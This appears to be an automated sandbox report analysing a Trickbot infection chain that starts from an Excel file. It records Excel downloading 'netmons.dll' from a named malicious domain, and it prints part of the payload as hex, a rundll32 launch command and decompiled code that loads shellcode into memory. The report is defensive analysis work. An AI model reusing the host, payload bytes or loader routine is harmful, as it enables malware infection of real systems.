                                      May 13, 2021 01:51:18.878273964 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:51:19.392293930 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:51:20.406229973 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:51:22.418972015 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:51:26.428466082 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:51:34.432070017 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:51:50.438832998 CEST4916580192.168.2.22198.54.114.131

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      May 13, 2021 01:49:18.931201935 CEST5219753192.168.2.228.8.8.8
                                      May 13, 2021 01:49:18.989450932 CEST53521978.8.8.8192.168.2.22

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      May 13, 2021 01:49:18.931201935 CEST192.168.2.228.8.8.80xccaeStandard query (0)koneckotechnology.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      May 13, 2021 01:49:18.989450932 CEST8.8.8.8192.168.2.220xccaeNo error (0)koneckotechnology.com198.54.114.131A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • koneckotechnology.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.2249165198.54.114.13180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      TimestampkBytes transferredDirectionData
                                      May 13, 2021 01:49:19.201585054 CEST0OUTGET /netmons.dll HTTP/1.1
                                      Accept: */*
                                      UA-CPU: AMD64
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                      Host: koneckotechnology.com
                                      Connection: Keep-Alive
                                      May 13, 2021 01:49:19.398214102 CEST2INHTTP/1.1 200 OK
                                      date: Wed, 12 May 2021 23:49:19 GMT
                                      server: Apache
                                      last-modified: Wed, 12 May 2021 13:22:52 GMT
                                      accept-ranges: bytes
                                      content-length: 643072
                                      content-type: application/x-msdownload
                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 5d 9f e5 23 3c f1 b6 23 3c f1 b6 23 3c f1 b6 a0 34 ae b6 29 3c f1 b6 d9 1f e8 b6 25 3c f1 b6 30 34 ac b6 21 3c f1 b6 26 30 fe b6 38 3c f1 b6 26 30 ae b6 a9 3c f1 b6 23 3c f0 b6 62 3e f1 b6 a0 34 ac b6 30 3c f1 b6 26 30 91 b6 57 3c f1 b6 26 30 ad b6 22 3c f1 b6 cf 37 af b6 22 3c f1 b6 26 30 ab b6 22 3c f1 b6 52 69 63 68 23 3c f1 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c1 ab 9b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 07 0a 00 80 02 00 00 40 07 00 00 00 00 00 9a f2 00 00 00 10 00 00 00 90 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 3e 03 00 45 00 00 00 5c 21 03 00 04 01 00 00 00 a0 03 00 7c cf 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 09 00 80 34 00 00 a0 95 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e6 02 00 48 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 05 00 00 d4 20 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 78 02 00 00 10 00 00 00 80 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 ae 00 00 00 90 02 00 00 b0 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 59 00 00 00 40 03 00 00 30 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c cf 05 00 00 a0 03 00 00 d0 05 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 04 81 00 00 00 70 09 00 00 90 00 00 00 40 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$g]#<#<#<4)<%<04!<&08<&0<#<b>40<&0W<&0"<7"<&0"<Rich#<PEL`!@>E\!|p4H @.textx `.rdataU@@.dataY@0@@.rsrc|p@@.relocp@@B
                                      May 13, 2021 01:49:19.398264885 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii:
                                      May 13, 2021 01:49:19.398307085 CEST4INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii:
                                      May 13, 2021 01:49:19.398344994 CEST6INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii:
                                      May 13, 2021 01:49:19.398394108 CEST7INData Raw: ff ff e8 a5 ab 01 00 8b 4c 24 08 5e 64 89 0d 00 00 00 00 83 c4 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 6a ff 68 8b 7c 02 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 81 ec 14 03 00 00 a1 bc 51 03 10 56 89 84 24 14 03 00 00 8b f1 ff 15 28 90
                                      Data Ascii: L$^djh|dPd%QV$(/j@jL$dD$L$$ FTL$$ $d$3^C QVD$3jL$QhPt!D$
                                      May 13, 2021 01:49:19.398437977 CEST8INData Raw: 5f 5b c3 56 50 ff 15 8c 92 02 10 8b f0 85 f6 75 06 5e 5f 33 c0 5b c3 57 53 ff 15 90 92 02 10 8b 4c 24 18 03 c6 83 e1 0f 76 0e 3b f0 73 e3 49 0f b7 16 8d 74 56 02 75 f2 3b f0 73 d5 66 8b 06 66 f7 d8 1b c0 23 c6 5e 5f 5b c3 83 ec 70 a1 bc 51 03 10
                                      Data Ascii: _[VPu^_3[WSL$v;sItVu;sff#^_[pQD$lthxS3UD$D$l.VD$HD$)D$@WPD$HkD$IeD$JrD$KnD$Le\$MD$N3D$O2D$Qd\$R\$SD$TD$,nD$-tD$.d\$/\$0D$2d\$3\$4D$5:c
                                      May 13, 2021 01:49:19.398479939 CEST10INData Raw: 68 04 8d 43 0c 83 c9 ff f0 0f c1 08 49 85 c9 5f 7f 08 8b 0b 8b 11 53 ff 52 04 8b 44 24 14 8b 4c 24 0c 5e 5d 89 01 5b 59 c2 04 00 cc cc cc cc cc 56 57 8b 7c 24 0c 8b f1 8b 06 8b 48 f0 8b 11 83 e8 10 6a 01 57 50 ff 52 08 85 c0 75 05 e8 4e ff ff ff
                                      Data Ascii: hCI_SRD$L$^][YVW|$HjWPRuN_^VD$tVh^VW|$PhWZQhWHlRhW6VhW$_^d
                                      May 13, 2021 01:49:19.398519993 CEST11INData Raw: e9 02 83 c6 10 8d 78 10 f3 a5 8b ca 83 e1 03 f3 a4 5f 5e c3 cc cc 55 8b ec 6a ff 68 d0 7c 02 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 81 ec 98 01 00 00 a1 bc 51 03 10 53 56 57 33 db 8b f1 89 65 f0 53 8d 8e a4 01 00 00 68 41 10 00 00 89 45 ec
                                      Data Ascii: x_^Ujh|dPd%QSVW3eShAEh4]^|P \Qh<;t)Ph2MdM_^[]RUb$V+^
                                      May 13, 2021 01:49:19.398560047 CEST13INData Raw: f0 8b 07 8b 50 fc 83 e8 10 b9 01 00 00 00 2b ca 8b 50 08 2b d6 83 c4 08 0b ca 7d 08 56 8b cf e8 08 fa ff ff 8b 07 55 53 50 e8 7b c2 00 00 83 c4 0c 85 f6 7c 17 8b 07 3b 70 f8 7f 10 89 70 f4 8b 0f c6 04 0e 00 5e 5d 5f 5b c2 08 00 68 57 00 07 80 e8
                                      Data Ascii: P+P+}VUSP{|;pp^]_[hWvD$SUl$Vt$EP+P+}SEt$WT$L$$t$ <_|E;XXM^][hWQSUE
                                      May 13, 2021 01:49:19.398598909 CEST14INData Raw: e8 9d fa ff ff c3 cc cc cc cc cc cc cc cc cc cc cc cc 6a ff 68 68 7d 02 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 51 56 8b 74 24 1c 8b 06 8b 48 f0 8b 11 57 33 ff 89 7c 24 08 ff 52 10 8b 10 8b c8 ff 52 0c 83 c0 10 89 44 24 20 8b 44 24 24 8b 00
                                      Data Ascii: jhh}dPd%QVt$HW3|$RRD$ D$$PqRPVQL$0Q|$(t$4V|$4D$VHVRL$_^dVt$u3PV^Wxd$@u+_PV
                                      May 13, 2021 01:49:19.589345932 CEST15INData Raw: 44 fc ff ff 8b 7c 24 34 50 8d 44 24 18 57 50 c7 44 24 38 00 00 00 00 e8 bc fa ff ff 8d 4f 04 51 50 8d 4c 24 24 51 c6 44 24 44 01 e8 a8 fa ff ff 83 c4 18 8b 44 24 14 83 c0 f0 c6 44 24 2c 04 8d 50 0c 83 c9 ff f0 0f c1 0a 49 85 c9 7f 08 8b 08 8b 11
                                      Data Ascii: D|$4PD$WPD$8OQPL$$QD$DD$D$,PIPRD$D$,HJPRD$hhjjjjjPj#9qWjjjjjjUphUjjjjjh(j#qRD$4D$ h


                                      Code Manipulations

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:01:48:40
                                      Start date:13/05/2021
                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                      Imagebase:0x13f500000
                                      File size:27641504 bytes
                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:01:48:45
                                      Start date:13/05/2021
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32 ..\hsdksksk.iem,StartW
                                      Imagebase:0xff1d0000
                                      File size:45568 bytes
                                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:01:48:46
                                      Start date:13/05/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:rundll32 ..\hsdksksk.iem,StartW
                                      Imagebase:0x740000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, Author: Joe Security
                                      Reputation:high

                                      General

                                      Start time:01:48:47
                                      Start date:13/05/2021
                                      Path:C:\Windows\System32\wermgr.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\wermgr.exe
                                      Imagebase:
                                      File size:50688 bytes
                                      MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Disassembly

                                      Code Analysis

                                      Reset < >

                                        Executed Functions

                                        APIs
                                        • LoadLibraryW.KERNEL32(003A4054), ref: 003A1047
                                        • GetProcAddress.KERNEL32(00000000), ref: 003A104E
                                          • Part of subcall function 003A1B30: SetLastError.KERNEL32(0000000D,?,003A1070,?,00000040), ref: 003A1B3D
                                        • SetLastError.KERNEL32(000000C1), ref: 003A1096
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100604820.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                                        Similarity
                                        • API ID: ErrorLast$AddressLibraryLoadProc
                                        • String ID:
                                        • API String ID: 1866314245-0
                                        • Opcode ID: 99f934b0cf2f947a60ab3ebabd83808da67444d120cccc304c7102426e49405c
                                        • Instruction ID: 3a30aaf8e5832dca19cac778f99d23524b7f6fe6e06f29b32e87f9e30819be4e
                                        • Opcode Fuzzy Hash: 99f934b0cf2f947a60ab3ebabd83808da67444d120cccc304c7102426e49405c
                                        • Instruction Fuzzy Hash: 4DF1F9B4A00209EFDB05CF98D984AAEB7B5FF49304F208598E905AB351D775EE41DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00413450() {
                                        				_Unknown_base(*)()* _v8;
                                        				void* _v12;
                                        				struct tagMSG _v40;
                                        				long _v44;
                                        				struct HWND__* _v48;
                                        				long _v52;
                                        				void* _v56;
                                        				void* _t38;
                                        				void* _t43;
                                        				int _t45;
                                        
                                        				SetTimer(0, 0, 0x25b, 0); // executed
                                        				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
                                        					_v40.message = _v40.message + 1;
                                        					if(_v40.message != 0x114) {
                                        						DispatchMessageW( &_v40);
                                        						continue;
                                        					} else {
                                        					}
                                        					break;
                                        				}
                                        				_v12 = 0;
                                        				_v48 = 0;
                                        				_v52 = 0x5000;
                                        				while(_v52 > 0x1000) {
                                        					_v52 = _v52 - 1;
                                        				}
                                        				_v44 = _v52;
                                        				while(_v44 > 0x40) {
                                        					_v44 = _v44 - 1;
                                        				}
                                        				do {
                                        					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
                                        					_v8 = _t38;
                                        					if(_v8 == 0) {
                                        						Sleep(0x1f4);
                                        					}
                                        				} while (_v8 == 0);
                                        				_v48 =  &(_v48->i);
                                        				E003E1000(_v48, _v8);
                                        				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
                                        				_v56 = _t43;
                                        				SetTimer(0, 0, 0x2000, 0); // executed
                                        				while(1) {
                                        					_t45 = GetMessageW( &_v40, 0, 0, 0);
                                        					if(_t45 == 0) {
                                        						break;
                                        					}
                                        					_v40.message = _v40.message + 1;
                                        					if(_v40.message == 0x114) {
                                        						return _t45;
                                        					}
                                        					DispatchMessageW( &_v40);
                                        				}
                                        				return _t45;
                                        			}













                                        0x00413461
                                        0x00413467
                                        0x00413481
                                        0x0041348b
                                        0x00413493
                                        0x00000000
                                        0x00000000
                                        0x0041348d
                                        0x00000000
                                        0x0041348b
                                        0x0041349b
                                        0x004134a2
                                        0x004134a9
                                        0x004134b0
                                        0x004134bf
                                        0x004134bf
                                        0x004134c7
                                        0x004134ca
                                        0x004134d6
                                        0x004134d6
                                        0x004134db
                                        0x004134ec
                                        0x004134f2
                                        0x004134f9
                                        0x00413500
                                        0x00413500
                                        0x00413506
                                        0x00413512
                                        0x0041351d
                                        0x00413530
                                        0x00413536
                                        0x00413544
                                        0x0041354a
                                        0x00413554
                                        0x0041355c
                                        0x00000000
                                        0x00000000
                                        0x00413564
                                        0x0041356e
                                        0x00000000
                                        0x00000000
                                        0x00413576
                                        0x00413576
                                        0x00413581

                                        APIs
                                        • SetTimer.USER32(00000000,00000000,0000025B,00000000), ref: 00413461
                                        • GetMessageW.USER32 ref: 00413471
                                        • DispatchMessageW.USER32(?), ref: 00413493
                                        • VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 004134EC
                                        • Sleep.KERNEL32(000001F4), ref: 00413500
                                        • CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 00413530
                                        • SetTimer.USER32(00000000,00000000,00002000,00000000), ref: 00413544
                                        • GetMessageW.USER32 ref: 00413554
                                        • DispatchMessageW.USER32(?), ref: 00413576
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                        • Associated: 00000004.00000002.2100646234.00000000003E0000.00000004.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.2100674607.0000000000414000.00000002.00000001.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
                                        • String ID: @
                                        • API String ID: 368155642-2766056989
                                        • Opcode ID: 2f3e8dbad38843a24aef62b3436365cc400f592c1473fe8d441ee3ac971ca9f9
                                        • Instruction ID: 44c463ef690f25470bb84213320d49a3266ac65cf2ff706d090cb3e128e0f6b6
                                        • Opcode Fuzzy Hash: 2f3e8dbad38843a24aef62b3436365cc400f592c1473fe8d441ee3ac971ca9f9
                                        • Instruction Fuzzy Hash: AB41FF70E44208EBEB14CFE4DD49BDD7B75BB48B06F208159E605BA2C0D775AA40DB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: D7Q$D7Q$^f`
                                        • API String ID: 0-3924766165
                                        • Opcode ID: ad4a532fddcd80d30b33d0da489fb9b9524c8ea56129d3c6e399582ed2041803
                                        • Instruction ID: a88513a42ae4edc72098345a0061623ac80cf6444a11f5343d6f337f266ea0d8
                                        • Opcode Fuzzy Hash: ad4a532fddcd80d30b33d0da489fb9b9524c8ea56129d3c6e399582ed2041803
                                        • Instruction Fuzzy Hash: 4722BE7460A300DFD724CF28C490BAA77E1AB89714F608A5EF989DB3A0D635D845DF4B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetLastError.KERNEL32(0000007F), ref: 003A14DB
                                        • SetLastError.KERNEL32(0000007F), ref: 003A1507
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100604820.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        • Opcode ID: 06667242bfe94e001060d71fc9947cd6ae2d8a948372181b1529b86757f5c9fa
                                        • Instruction ID: e75ee58cc4ee4d02c6376251354a9c7ed38f49cb09a2fe427d239d4f941240a0
                                        • Opcode Fuzzy Hash: 06667242bfe94e001060d71fc9947cd6ae2d8a948372181b1529b86757f5c9fa
                                        • Instruction Fuzzy Hash: D1710974E04109DFCB05DF98C980AAEB7B6FF4A304F258598E816AB391D734EE41DB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 003A21F9
                                        • SetLastError.KERNEL32(0000007E), ref: 003A223B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100604820.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                                        Similarity
                                        • API ID: ErrorHugeLastRead
                                        • String ID:
                                        • API String ID: 3239643929-0
                                        • Opcode ID: 10cb3f2f79d117b8670fc8a10069001fd89d651e3ebad30ab9ff9c8dc1e87c76
                                        • Instruction ID: 004b2d93a9b80ecca697d67c22f0f79e478563046c7b7e2900b525f75214a74e
                                        • Opcode Fuzzy Hash: 10cb3f2f79d117b8670fc8a10069001fd89d651e3ebad30ab9ff9c8dc1e87c76
                                        • Instruction Fuzzy Hash: 1E81A974A00209DFDB05CF98C894AAEBBB5FF49314F258158E949AB391D734EE85CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LoadLibraryW.KERNEL32(003A4088), ref: 003A2731
                                        • LoadLibraryW.KERNEL32(003A409C), ref: 003A2745
                                        • LoadLibraryW.KERNEL32(003A40B4), ref: 003A2759
                                        • LoadLibraryW.KERNEL32(003A40D0), ref: 003A276D
                                          • Part of subcall function 003A14A0: SetLastError.KERNEL32(0000007F), ref: 003A14DB
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100604820.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 517a7a9d08da9887fe4f23fc0bdb0be4560e2e91a15f1b006e9085969c9407bc
                                        • Instruction ID: b1dd776e2846b55385595d18b9691c0ad20ad2e32c673c76e4d2803e5b59cdf6
                                        • Opcode Fuzzy Hash: 517a7a9d08da9887fe4f23fc0bdb0be4560e2e91a15f1b006e9085969c9407bc
                                        • Instruction Fuzzy Hash: D8014FBAD00204BBD702EBF4AC0B8DFBE68EB57315F004564F90696602FAB5965497A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetNativeSystemInfo.KERNEL32(?,?,?,?,002C0005), ref: 002C00E9
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002C0005), ref: 002C0111
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocInfoNativeSystemVirtual
                                        • String ID:
                                        • API String ID: 2032221330-0
                                        • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                        • Instruction ID: 94805d92e8a5710e556b82c99a0c880d204d7bdc716e9a9356ee1e0684111b64
                                        • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                        • Instruction Fuzzy Hash: 56D1D271A14746CFDB24CF69C8C4B6AB3E0FF94308F18462DE9958B241E774E865CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100604820.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3d52aa46ef053cf39f99dbefe7a6b679e3e436dffe16e4e32d54890ebfdc073
                                        • Instruction ID: d66f99ed4aa28d52ab79febf2d12ee6a4815639cc267df4d0add357c0304ca16
                                        • Opcode Fuzzy Hash: f3d52aa46ef053cf39f99dbefe7a6b679e3e436dffe16e4e32d54890ebfdc073
                                        • Instruction Fuzzy Hash: DC41B278A04209AFDB05CF44C494BAAB7B6FB89314F24C199E8199F355D775EE82CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,003A1A51,00003000,00000004,000000BE,?,003A1A51,?), ref: 003A1A01
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100604820.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 5d5b5cbf2e4e31beec734ddf41d954d48c274a836252b352d0efd9f8f7c683a7
                                        • Instruction ID: 6f42475785112f297fd34f85fefda771551d831aad73c98a39c7bfdbcccf8eac
                                        • Opcode Fuzzy Hash: 5d5b5cbf2e4e31beec734ddf41d954d48c274a836252b352d0efd9f8f7c683a7
                                        • Instruction Fuzzy Hash: 6AD0C9B4645208BBE710CB84DC06F69BBACD705711F004185FE089B280D5B1AE0056A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualFree.KERNELBASE(?,?,?), ref: 003A182F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100604820.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 154cd5d664cb3d4cbf3288835350f6e4aee65aae7f208f56eb1411c34e7df905
                                        • Instruction ID: d034658c04d337e3749e73c96629042909cac76406cdc00a78fb29bb72534bab
                                        • Opcode Fuzzy Hash: 154cd5d664cb3d4cbf3288835350f6e4aee65aae7f208f56eb1411c34e7df905
                                        • Instruction Fuzzy Hash: 66C04C7611430CAB8B04DFD8EC84DAB77ADBB8C710B048508BA1D87200D630F9108BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                        • Instruction ID: d8027fbdeeeec420ab7cd25c4d6952e22a6b2bd8d5e4c75913c76a421490705c
                                        • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                        • Instruction Fuzzy Hash: 6CF1D3B4A11209EFDB04CF94C990FAEB7B5EF48304F208698E906AB345D775EE51DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                        • Instruction ID: a3fe3b26cbc9f97461d72e5453a5083cdb9211d9f9574f2fc520dab5724b7dda
                                        • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
